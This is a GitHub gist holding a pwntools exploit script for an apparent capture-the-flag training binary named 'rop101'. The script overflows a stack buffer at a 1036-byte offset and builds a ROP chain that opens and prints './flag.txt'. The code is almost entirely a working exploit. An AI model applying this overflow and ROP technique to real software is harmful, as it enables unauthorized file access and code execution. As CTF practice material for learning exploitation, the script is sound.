Skip to content

Instantly share code, notes, and snippets.

@isra17 isra17/rop101.py Secret

Created Nov 3, 2016
Embed
What would you like to do?
from pwn import *
context.log_level = 'debug'
# Use the following to get the buffer overflow offset.
# Using cyclic, make crash the program on a specific value.
# From gdb, doing `x $esp` gives 0x6b61616a.
# cyclic_find(0x6b61616a) == 1036
#p = process("./rop101")
#gdb.attach(p)
#p.recvuntil("quit\n")
#p.sendline("1")
#p.recvuntil(": ")
#p.sendline("-1")
#p.sendline(cyclic(3000))
#p.recvuntil("quit\n")
#p.sendline("4")
#p.recvall()
#import sys;sys.exit()
elf = ELF('./rop101')
padding = cyclic_find(0x6b61616a)
cave = elf.bss()
target = './flag.txt\x00'
rop = ROP(elf)
rop.read(0, cave, len(target))
rop.open(cave, 0)
rop.read(3, cave, 0x100)
rop.write(1, cave, 0x100)
rop.raw(0)
print(rop.dump())
payload = 'A' * padding + str(rop)
#s = remote('workshop.dciets.com', 8002)
s = process("./rop101")
s.recvuntil("quit\n")
s.sendline("1")
s.recvuntil(": ")
s.sendline("-1")
s.sendline(payload)
s.recvuntil("quit\n")
s.sendline("4")
s.recvuntil("kthxbye\n")
s.send(target)
print("Flag: %s" % s.recv())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.